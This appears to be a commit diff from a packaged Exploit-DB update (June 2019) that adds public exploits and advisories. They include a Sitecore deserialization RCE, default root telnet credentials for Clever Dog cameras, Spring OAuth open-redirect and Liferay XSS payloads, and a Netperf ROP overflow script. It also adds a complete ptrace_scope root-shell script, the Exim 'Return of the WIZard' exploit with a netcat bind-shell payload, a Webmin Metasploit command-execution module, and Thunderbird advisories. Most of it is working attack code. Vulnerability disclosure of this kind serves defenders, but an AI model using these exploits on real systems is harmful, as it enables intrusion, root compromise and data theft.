Commit 73bcc520 authored by Devon Kearns's avatar Devon Kearns

New upstream version 20190618

parent 68d1624a
# Exploit Title: Sitecore v 8.x Deserialization RCE
# Date: Reported to vendor October 2018, fix released April 2019.
# Exploit Author: Jarad Kopf
# Vendor Homepage: https://www.sitecore.com/
# Software Link: Sitecore downloads: https://dev.sitecore.net/Downloads.aspx
# Version: Sitecore 8.0 Revision 150802
# Tested on: Windows
# CVE : CVE-2019-11080
Exploit:
Authentication is needed for this exploit. An attacker needs to login to Sitecore 8.0 revision 150802's Admin section.
When choosing to Serializeusers or domains in the admin UI, calls to /sitecore/shell/~/xaml/Sitecore.Shell.Applications.Dialogs.Progress.aspx will include a CSRFTOKEN parameter.
By replacing this parameter with a URL-encoded, base64-encoded crafted payload from ysoserial.net, an RCE is successful.
\ No newline at end of file
1. Advisory Information
========================================
Title: Clever Dog Smart Camera
Vendor Homepage: http://www.cleverdog.com.cn/
Tested on Camera types : DOG-2W, DOG-2W-V4
Vulnerability: Hardware- Multiple Vulnerabilities
Date: 14/06/2019
Author: Alex Akinbi Twitter: @alexakinbi
1. Unauthenticated file disclosure:
========================================
An attacker on the local network has unauthenticated access to the internal SD card via HTTP service on port 8000. The HTTP web server on the camera allows an attacker to download video archive recorded and saved on the external memory card attached.
For example: http://192.168.1.81:8000/20190606
2. Telnet Backdoor using default credentials:
========================================
An attacker on the network can login remotely to the camera and gain root access. The device ships with hard-coded credentials, accessible from a telnet login prompt using credentials username: " root" and password: "12345678". These credentials work on all devices.
3. Login password sent over network unencrypted using Clever Dog App:
========================================
Using a packet sniffer, an attacker on the same network can capture data packets and view
captured user login password MD5 hash. A weak password can be cracked and used to login to the user account.
4. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.
\ No newline at end of file
# Exploit Title: Open Redirector in spring-security-oauth2
# Date: 17 June 2019
# Exploit Author: Riemann
# Vendor Homepage: https://spring.io/projects/spring-security-oauth
# Software Link: https://spring.io
# Version: Spring Security OAuth versions 2.3 prior to 2.3.6 -org.springframework.security.oauth:spring-security-oauth2:2.3.3.RELEASE
# Tested on: UBUNTU 16.04 LTS -org.springframework.security.oauth:spring-security-oauth2:2.3.3.RELEASE
# CVE : CVE-2019-11269 | CVE-2019-3778
# Description
Spring Security OAuth versions 2.3 prior to 2.3.6, 2.2 prior to 2.2.5, 2.1 prior to 2.1.5, and 2.0 prior to 2.0.18, as well as older unsupported versions could be susceptible to an open redirector attack that can leak an authorization code. A malicious user or attacker can craft a request to the authorization endpoint using the authorization code grant type, and specify a manipulated redirection URI via the redirect_uri parameter. This can cause the authorization server to redirect the resource owner user-agent to a URI under the control of the attacker with the leaked authorization code.
#VULNERABILITY:
By manipulating the REDIRECT_URI parameter, an attacker can actually bypass the validation.
The code causing the vulnerability is found under the package org.springframework.security.oauth2.provider.endpoint
The Class: DefaultRedirectResolver, which method obtainMatchingRedirect does not proper sanitation
/**
* Attempt to match one of the registered URIs to the that of the requested one.
*
* @param redirectUris the set of the registered URIs to try and find a match. This cannot be null or empty.
* @param requestedRedirect the URI used as part of the request
* @return the matching URI
* @throws RedirectMismatchException if no match was found
*/
private String obtainMatchingRedirect(Set<String> redirectUris, String requestedRedirect) {
Assert.notEmpty(redirectUris, "Redirect URIs cannot be empty");
if (redirectUris.size() == 1 && requestedRedirect == null) {
return redirectUris.iterator().next();
}
for (String redirectUri : redirectUris) {
if (requestedRedirect != null && redirectMatches(requestedRedirect, redirectUri)) {
return requestedRedirect;
}
}
throw new RedirectMismatchException("Invalid redirect: " + requestedRedirect
+ " does not match one of the registered values: " + redirectUris.toString());
}
#POC ATTACK VECTOR
The following request done by the CLIENT APP after the user has logged in, contains the REDIRECT_URI parameter. The validation is bypassed by simply adding a percentage sign which triggers a redirect instead of the RedirectMismatchException error
The ORIGINAL REQUEST containing a valid URI:
GET /auth/oauth/authorize?response_type=code&client_id=R2dpxQ3vPrtfgF72&scope=user_info&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D&redirect_uri=http://localhost:8086/login/oauth2/code/ HTTP/1.1
The attacker then tricks the application by changing entirely the URI to another server adding a percentage for example:
GET /auth/oauth/authorize?response_type=code&client_id=R2dpxQ3vPrtfgF72&scope=user_info&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D&redirect_uri=http://%localhost:9000/login/oauth2/code/ HTTP/1.1
Host: localhost:8085
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8085/auth/login
Connection: close
Cookie: JSESSIONID=3394FD89204BE407CB585881755C0828; JSESSIONID=C0F1D5A2F1944DCB43F2BFFA416B7A63
Upgrade-Insecure-Requests: 1
The RESPONSE indeed does not produce an expected OAUTH error but redirects the user :
HTTP/1.1 302
Cache-Control: no-store
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Location: http://localhost:8086/login/oauth2/code/?code=4ecsea&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D
Content-Language: en-US
Content-Length: 0
Date: Mon, 17 Jun 2019 11:06:18 GMT
Connection: close
\ No newline at end of file
# Exploit Title: Liferay Portal < 7.1 CE GA4 / SimpleCaptcha API XSS
# Date: 04/06/2019
# Exploit Author: Valerio Brussani (@val_brux)
# Website: www.valbrux.it
# Vendor Homepage: https://www.liferay.com/
# Software Link: https://www.liferay.com/it/downloads-community
# Version: < 7.1 CE GA4
# Tested on: Liferay Portal 7.1 CE GA3
# CVE: CVE-2019-6588
# Reference1: https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-71/-/asset_publisher/7v4O7y85hZMo/content/cst-7130-multiple-xss-vulnerabilities-in-7-1-ce-ga3
# Reference2: https://www.valbrux.it/blog/2019/06/04/cve-2019-6588-liferay-portal-7-1-ce-ga4-simplecaptcha-api-xss/
Introduction
In Liferay Portal before 7.1 CE GA4, an XSS vulnerability exists in the SimpleCaptcha API when custom code passes unsanitized input
into the “url” parameter of the JSP taglib call <liferay-ui:captcha url=”<%= url %>” /> or <liferay-captcha:captcha url=”<%= url %>” />.
A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability.
Poc
In a sample scenario of custom code calling the <liferay-ui:captcha url=”<%= url %>” /> JSP taglib, appending a payload like the following to the body parameters of a customized form:
&xxxx%22%3e%3cscript%3ealert(1)</script>
The script is reflected in the src attribute of the <img> tag, responsible of fetching the next available captcha:
<img alt=”xxx” class=”xxxx” src=”xxxxxx“><script>alert(1)</script>=” />
\ No newline at end of file
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
#
# Tested on: Kali i686 GNU/Linux
#
# Description: Netperf 2.6.0 s a benchmark tool than developed by Helett Packard that can be used to measure the performance of many different types of networking.
# It provides tests for both unidirectional troughput and end-to-end latency.
#
# Vendor: https://hewlettpackard.github.io/netperf/
#
# Program received signal SIGSEGV, Segmentation fault.
# 0x41424344 in ?? ()
# LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
# EAX 0x6d
# EBX 0x41414141 ('AAAA')
# ECX 0x6f
# EDX 0x430320 (test_name) 'TCP_STREAM'
# EDI 0xb7ea2000 (_GLOBAL_OFFSET_TABLE_)
# ESI 0xbfffd2c0 0x3
# EBP 0x41414141 ('AAAA')
# ESP 0xbfffd280 0x0
# EIP 0x41424344 ('DCBA')
# Invalid address 0x41424344
# Program received signal SIGSEGV (fault address 0x41424344)
# PoC: run -a `python -c 'print "A"*8220+"DCBA"'`
from struct import pack
# int mprotect(void *addr, size_t len, int prot);
# define PROT_READ 0x1
# define PROT_WRITE 0x2
# define PROT_EXEC 0x4
#
# gef p mprotect
# $1 = {<text variable, no debug info>} 0xb7dbdfd0 <mprotect>
# gef p read
#{ssize_t (int, void *, size_t)} 0xb7db06b0 <__GI___libc_read>
#
# gef ropgadget
#pop3ret = 0x402fea
offset = 8220
mprotect = 0xb7dbdfd0 # <mprotect>
read = 0xb7db06b0 # <read>
pop3ret = 0x402fea
target_memory = 0xb7fd4000 # r-xp [vdso]
rop_chain = 'A' * offset
rop_chain += pack('I', mprotect) # mprotect
rop_chain += pack('I', pop3ret) # gadget
rop_chain += pack('I', 0xbffdf000) # arg - void*
rop_chain += pack('I', 0x100000) # arg size_t
rop_chain += pack('I',0x7) # arg int
rop_chain += pack('I', read)
rop_chain += pack('I', 0xbffdf000) # return stack
rop_chain += pack('I',0x00) # arg int fd
rop_chain += pack('I',0xbffdf000) # arg void
rop_chain += pack('I',0x200) # arg size_t
print rop_chain
\ No newline at end of file
......@@ -2,7 +2,7 @@
#
# Exploit Title: Vesta Control Panel 0.9.7 <= 0.9.8-16 Local Privilege Escalation Exploit
# Google Dork: vesta control panel inurl:8083
# Exploit Author: Luka Pusic @lukapusic, Jaka Hudoklin @offlinehacker
# Exploit Author: Luka Pusic, Jaka Hudoklin @offlinehacker
# Vendor Homepage: http://vestacp.com/
# Software Link: https://github.com/serghey-rodin/vesta
# Version: 0.9.7 - 0.9.8-16
......
#!/usr/bin/env bash
#######################################################
# #
# 'ptrace_scope' misconfiguration #
# Local Privilege Escalation #
# #
#######################################################
# Affected operating systems (TESTED):
# Parrot Home/Workstation 4.6 (Latest Version)
# Parrot Security 4.6 (Latest Version)
# CentOS / RedHat 7.6 (Latest Version)
# Kali Linux 2018.4 (Latest Version)
# Authors: Marcelo Vazquez (s4vitar)
# Victor Lasa (vowkin)
#┌─[s4vitar@parrot]─[~/Desktop/Exploit/Privesc]
#└──╼ $./exploit.sh
#
#[*] Checking if 'ptrace_scope' is set to 0... [√]
#[*] Checking if 'GDB' is installed... [√]
#[*] System seems vulnerable! [√]
#
#[*] Starting attack...
#[*] PID -> sh
#[*] Path 824: /home/s4vitar
#[*] PID -> bash
#[*] Path 832: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> bash
#[*] Path 1816: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> bash
#[*] Path 1842: /home/s4vitar
#[*] PID -> bash
#[*] Path 1852: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> bash
#[*] Path 1857: /home/s4vitar/Desktop/Exploit/Privesc
#
#[*] Cleaning up... [√]
#[*] Spawning root shell... [√]
#
#bash-4.4# whoami
#root
#bash-4.4# id
#uid=1000(s4vitar) gid=1000(s4vitar) euid=0(root) egid=0(root) grupos=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),136(scanner),1000(s4vitar)
#bash-4.4#
function startAttack(){
tput civis && pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d' | while read shell_pid; do
if [ $(cat /proc/$shell_pid/comm 2>/dev/null) ] || [ $(pwdx $shell_pid 2>/dev/null) ]; then
echo "[*] PID -> "$(cat "/proc/$shell_pid/comm" 2>/dev/null)
echo "[*] Path $(pwdx $shell_pid 2>/dev/null)"
fi; echo 'call system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")' | gdb -q -n -p "$shell_pid" >/dev/null 2>&1
done
if [ -f /tmp/bash ]; then
/tmp/bash -p -c 'echo -ne "\n[*] Cleaning up..."
rm /tmp/bash
echo -e " [√]"
echo -ne "[*] Spawning root shell..."
echo -e " [√]\n"
tput cnorm && bash -p'
else
echo -e "\n[*] Could not copy SUID to /tmp/bash [✗]"
fi
}
echo -ne "[*] Checking if 'ptrace_scope' is set to 0..."
if grep -q "0" < /proc/sys/kernel/yama/ptrace_scope; then
echo " [√]"
echo -ne "[*] Checking if 'GDB' is installed..."
if command -v gdb >/dev/null 2>&1; then
echo -e " [√]"
echo -e "[*] System seems vulnerable! [√]\n"
echo -e "[*] Starting attack..."
startAttack
else
echo " [✗]"
echo "[*] System is NOT vulnerable :( [✗]"
fi
else
echo " [✗]"
echo "[*] System is NOT vulnerable :( [✗]"
fi; tput cnorm
\ No newline at end of file
#!/bin/bash
#
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
# Improper validation of recipient address in deliver_message()
# function in /src/deliver.c may lead to remote command execution.
# (CVE-2019-10149)
#
# This is a local privilege escalation exploit for "The Return
# of the WIZard" vulnerability reported by the Qualys Security
# Advisory team.
#
# Credits:
# Qualys Security Advisory team (kudos for your amazing research!)
# Dennis 'dhn' Herrmann (/dev/tcp technique)
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
#
METHOD="setuid" # default method
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'
# usage instructions
function usage()
{
echo "$0 [-m METHOD]"
echo
echo "-m setuid : use the setuid payload (default)"
echo "-m netcat : use the netcat payload"
echo
exit 1
}
# payload delivery
function exploit()
{
# connect to localhost:25
exec 3<>/dev/tcp/localhost/25
# deliver the payload
read -u 3 && echo $REPLY
echo "helo localhost" >&3
read -u 3 && echo $REPLY
echo "mail from:<>" >&3
read -u 3 && echo $REPLY
echo "rcpt to:<$PAYLOAD>" >&3
read -u 3 && echo $REPLY
echo "data" >&3
read -u 3 && echo $REPLY
for i in {1..31}
do
echo "Received: $i" >&3
done
echo "." >&3
read -u 3 && echo $REPLY
echo "quit" >&3
read -u 3 && echo $REPLY
}
# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
echo
# parse command line
while [ ! -z "$1" ]; do
case $1 in
-m) shift; METHOD="$1"; shift;;
* ) usage
;;
esac
done
if [ -z $METHOD ]; then
usage
fi
# setuid method
if [ $METHOD = "setuid" ]; then
# prepare a setuid shell helper to circumvent bash checks
echo "Preparing setuid shell helper..."
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
if [ $? -ne 0 ]; then
echo "Problems compiling setuid shell helper, check your gcc."
echo "Falling back to the /bin/sh method."
cp /bin/sh /tmp/pwned
fi
echo
# select and deliver the payload
echo "Delivering $METHOD payload..."
PAYLOAD=$PAYLOAD_SETUID
exploit
echo
# wait for the magic to happen and spawn our shell
echo "Waiting 5 seconds..."
sleep 5
ls -l /tmp/pwned
/tmp/pwned
# netcat method
elif [ $METHOD = "netcat" ]; then
# select and deliver the payload
echo "Delivering $METHOD payload..."
PAYLOAD=$PAYLOAD_NETCAT
exploit
echo
# wait for the magic to happen and spawn our shell
echo "Waiting 5 seconds..."
sleep 5
nc -v 127.0.0.1 31337
# print help
else
usage
fi
\ No newline at end of file
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin <= 1.910 - "Package Updates" Remote Command Execution',
'Description' => %q(
This module exploits an arbitrary command execution vulnerability in Webmin
1.910 and lower versions. Any user authorized to the "Package Updates"
module can execute arbitrary commands with root privileges.
),
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-'],
['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html']
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'DefaultOptions' =>
{
'RPORT' => 10000,
'SSL' => false,
'PAYLOAD' => 'cmd/unix/reverse_python' # its depends
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [['Webmin <= 1.910', {}]],
'DisclosureDate' => 'May 16 2019',
'DefaultTarget' => 0)
)
register_options [
OptString.new('USERNAME', [true, 'Webmin Username']),
OptString.new('PASSWORD', [true, 'Webmin Password']),
OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
]
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'session_login.cgi'),
'cookie' => 'testing=1',
'vars_post' => {
'page' => '',
'user' => datastore['USERNAME'],
'pass' => datastore['PASSWORD']
}
})
if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/
return $1
end
return nil unless res
''
end
##
# Target and input verification
##
def check
cookie = login
return CheckCode::Detected if cookie == ''
return CheckCode::Unknown if cookie.nil?
vprint_status('Attempting to execute...')
# check package update priv
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "package-updates/"),
'cookie' => "sid=#{cookie}"
})
if res && res.code == 200 && res.body =~ /Software Package Update/
print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
return CheckCode::Vulnerable
end
print_error("#{datastore['USERNAME']} has not the right to >>Package Update<<")
print_status("Please try with another user account!")
CheckCode::Safe
end
##
# Exploiting phase
##
def exploit
cookie = login
if cookie == '' || cookie.nil?
fail_with(Failure::Unknown, 'Failed to retrieve session cookie')
end
print_good("Session cookie: #{cookie}")
res = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
'headers' =>
{
'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1"
},
'cookie' => "redirect=1; testing=1; sid=#{cookie}"
)
unless res && res.code == 200
fail_with(Failure::Unknown, 'Request failed')
end
print_status("Attempting to execute the payload...")
exec(cookie)
end
def exec(cookie)
command = payload.encoded
res = send_request_cgi(
{
'method' => 'POST',
'cookie' => "sid=#{cookie}",
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
'headers' =>
{
'Referer' => "#{peer}/package-updates/?xnavigation=1"
},
'data' => "u=acl%2Fapt&u=%20%7C%20#{command}&ok_top=Update+Selected+Packages"
})
end
end
##
# The end of the adventure (o_O) // AkkuS
##
\ No newline at end of file
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
X41 D-Sec GmbH Security Advisory: X41-2019-004
Type confusion in Thunderbird
=============================
Severity Rating: Medium
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1555646
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11706
CWE: 843
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2019-004-thunderbird
Summary and Impact
==================
A type confusion has been identified in the Thunderbird email
client. The issue is present in the libical implementation, which was
forked from upstream libical version 0.47.
The issue can be triggered remotely, when an attacker sends an specially
crafted calendar attachment and does not require user interaction. It
might be used by a remote attacker to crash the process or leak
information from the client system via calendar replies.
X41 did not perform a full test or audit on the software.
Product Description
===================
Thunderbird is a free and open source email, newsfeed, chat, and
calendaring client, that's easy to set up and customize.
Analysis
========
A type confusion in icalproperty.c
icaltimezone_get_vtimezone_properties() can be triggered while parsing a
malformed calendar attachment. Missing sanity checks allows a TZID
property to be parsed as ICALFLOATVALUE but it is later used as a
string.
The bug manifests with strdup(tzid); being called with tzid containing
a bad pointer obtained by casting to char* from a float value, which
typically means segfaulting by dereferencing a non-mapped memory page.
An attacker might be able to deliver an input file containing specially
crafted float values as TZID properties which could point to arbitrary
memory positions.
Certain conditions could allow to exfiltrate information via a calendar
reply or other undetermined impact.
Proof of Concept
================
A reproducer eml file can be found in
https://github.com/x41sec/advisories/tree/master/X41-2019-004
Workarounds
===========
A fix is available from upstream. Alternatively, libical can be replaced
by icaljs, a JavaScript implementation of ical parsing, by setting
calendar.icaljs = true in Thunderbird configuration.
Timeline
========
2019-05-30 Issues reported to the vendor
2019-06-07 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released
About X41 D-SEC GmbH
====================
X41 is an expert provider for application security services.
Having extensive industry experience and expertise in the area of
information security, a strong core security team of world class
security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery.
Custom research and a IT security consulting and support services are
core competencies of X41.
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtO0ACgkQo5Klpg50
CxCkuA/+L513gnHCf0hOFGuFsGaEX6dPSmJi1g2Wom28cXJw7dEd6/qU4k5H64cI
yRDQR7vVt7+xUTlPIh8sguaPjB7xOlw+3pHpLo5+pfIuUuK/gK4Wm8ZF1Qv4okBs
e046d2Nd+UAX/WbEXLt4UHOowgVEJWHfq54WkKHNTseWpeww/sBNdv1qlliiUCWa
qnFMzA7rbgtOJl/LxS9xDOp5PufD3inR/Apvh49P8IhDj6L7+02fxGt0WdwA/8vF
TiI2V4bHEYrLmsUptSHSj10HKfMlEqKgWWQCunTGvUZvWWYHS6cS6a9EbHuWWyNY
8BNj045D0Gw0xL1697erebeIxOZ33+QdEp1NopVzpJkeZBZtx/XYPY3PnQ+HMRjr
4LwsjdDBeaMVgiUIZ2EZ08779MBYPNB+6p0byaWgyTbyHk0GRVxqRNwkU/8xS0f4
M9NUt75T7FjqU8VX/KyZsmXs+/8tauh0T3J9CYoQ73r/WoRxB0xeJCEJueRegctu
gSnIf+KApkmE+2WRc8CrPSZx42XhTjcoEgbcYSxGebEitd+bGz2j2gjwqxDGC8nr
QK30hr/lOaC0y6nblfCygx+G6hZH1dc2+fi6ZboWZRqRTtB2zIM+SulMj+QjtHCm
UMPFQeB8stxBfIAxLu8DojBq4YWP8N2wQ5MyAW3/TzTd+JO1Wbk=
=Hy9J
-----END PGP SIGNATURE-----
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47001.zip
\ No newline at end of file
X41 D-Sec GmbH Security Advisory: X41-2019-001
Heap-based buffer overflow in Thunderbird
=========================================
Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553814
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public